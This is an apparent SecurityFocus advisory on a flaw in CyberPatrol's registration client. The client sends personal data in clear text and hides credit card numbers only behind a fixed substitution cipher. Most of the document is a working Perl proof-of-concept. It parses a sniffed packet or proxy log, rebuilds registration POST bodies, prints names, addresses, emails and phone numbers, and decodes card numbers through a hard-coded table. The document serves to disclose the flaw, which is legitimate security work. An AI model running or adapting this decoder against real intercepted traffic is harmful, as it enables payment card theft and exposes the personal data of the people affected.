
source: https://www.securityfocus.com/bid/1977/info
CyberPatrol is popular web access restriction software by Microsys.
A vulnerability exists in the way CyberPatrol submits registration information from its client software to Microsys' backend (cybercentral.microsys.com) that could allow a remote attacker to gather confidential information including credit card details.
The client software claims that all information, including credit card details, is "scrambled" before being sent to Microsys' backend. Installation of a sniffer has shown that all information except the credit card number is actually sent to Microsys in clear text. A remote attacker could place a sniffer upstream from the sending client and gather the confidential registration information, together with the credit card number, which is protected only by a substitution cipher (please see the original Bugtraq message in the reference section for details on the cipher). Additionally, this information could be obtained by examining the log files of a proxy firewall.
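#!/usr/bin/perl
#
# Proof of concept for the CyberPatrol registration disclosure described in
# the advisory text that precedes this script (BID 1977).
#
# Reads a packet log named "log" from the current directory (presumably a
# Snort capture -- the original script called its filehandle SNORT; confirm
# against the capture format), stitches the body of each registration POST
# back together and prints the EMAIL, CARD, EXP, NAME, ADDR1, ADDR2, CITY and
# PHONE fields it finds.
#
# Every field except CARD is printed as it appears in the log once %20 and
# %40 have been unescaped. CARD is mapped back to digits through the fixed
# table in @DIGIT_FOR_TOKEN. That table has no key and does not vary between
# messages, so the "scrambling" gives the card number no more confidentiality
# on the wire, or in a proxy log, than the clear-text fields have.
# Registration traffic of this kind needs transport encryption.

use strict;
use warnings;

# Name of the capture file; fixed, as in the original script.
my $LOG_FILE = 'log';

# Substitution table for the CARD field: pattern => digit it stands for.
# Patterns are tried in this order and the first match wins. The only
# percent-escaped token the table knows is %7E; any other token prints
# nothing.
my @DIGIT_FOR_TOKEN = (
    [ qr/z/,   '0' ],
    [ qr/\{/,  '1' ],
    [ qr/x/,   '2' ],
    [ qr/y/,   '3' ],
    [ qr/%7E/, '4' ],
    [ qr/\./,  '5' ],
    [ qr/\|/,  '6' ],
    [ qr/\}/,  '7' ],
    [ qr/r/,   '8' ],
    [ qr/s/,   '9' ],
);

# Walk the CARD field one token at a time and print the digit each token
# stands for. A token is a single character, or a '%' plus the (up to) two
# characters after it.
sub print_card_digits {
    my ($card_field) = @_;

    my $pos = 0;
    while ( $pos < length($card_field) ) {
        my $token = substr( $card_field, $pos, 1 );
        if ( $token eq '%' ) {

            # substr() stops at the end of the string, so a truncated
            # escape at the tail cannot read past the field.
            $token = substr( $card_field, $pos, 3 );
            $pos += 2;
        }
        $pos++;

        for my $entry (@DIGIT_FOR_TOKEN) {
            my ( $pattern, $digit ) = @{$entry};
            if ( $token =~ $pattern ) {
                print $digit;
                last;
            }
        }
    }
    return;
}

# Print one reassembled registration record. $raw is the concatenated text
# collected since the last POST marker; it may be empty, in which case
# nothing is printed.
sub print_record {
    my ($raw) = @_;

    # Only these two escapes are undone; everything else is left as logged.
    $raw =~ s/%20/ /g;
    $raw =~ s/%40/\@/g;

    # Keep what follows the first "...." separator and split it into the
    # '&'-delimited form fields.
    my ( undef, $body ) = split /\.\.\.\./, $raw;
    $body = q{} if !defined $body;
    my @fields = split /&/, $body;

    # True when field $index exists and contains $label.
    my $has = sub {
        my ( $index, $label ) = @_;
        return defined $fields[$index] && $fields[$index] =~ /$label/;
    };

    print "$fields[0]\n" if $has->( 0, 'EMAIL' );
    print 'CARD='        if $has->( 1, 'CARD' );

    # The second field is run through the table whether or not it carries
    # the CARD label, as the original did.
    print_card_digits( defined $fields[1] ? $fields[1] : q{} );

    print "\n$fields[2]\n"   if $has->( 2, 'EXP' );
    print "$fields[3]\n"     if $has->( 3, 'NAME' );
    print "$fields[4]\n"     if $has->( 4, 'ADDR1' );
    print "$fields[5]\n"     if $has->( 5, 'ADDR2' );
    print "$fields[6]\n"     if $has->( 6, 'CITY' );
    print "$fields[7]\n\n\n" if $has->( 7, 'PHONE' );

    return;
}

# Fail loudly when the capture is missing instead of silently printing
# nothing, which is what the unchecked two-argument open used to do.
open my $log_fh, '<', $LOG_FILE
    or die "cannot open $LOG_FILE: $!\n";

my $in_post  = 0;      # set once a line containing POST has been seen
my $raw_post = q{};    # text collected for the record in progress

LINE:
while ( my $line = <$log_fh> ) {

    # Lines that split on single whitespace characters into 2 to 15 pieces
    # are ignored (presumably headers and short dump rows -- confirm against
    # the log format).
    my @columns = split /\s/, $line;
    next LINE if $#columns > 0 && $#columns < 15;

    # A line without any word character ends the current record.
    if ( $line !~ /\w/ ) {
        print_record($raw_post);
        $raw_post = q{};
        $in_post  = 0;
    }

    $in_post = 1 if $line =~ /POST/;

    if ($in_post) {

        # Only the second space-separated piece of the line is kept
        # (presumably the printable-text column of the dump).
        my ( undef, $chunk ) = split / /, $line;
        if ( defined $chunk ) {
            chomp $chunk;
            $raw_post .= $chunk;
        }
    }
}

close $log_fh;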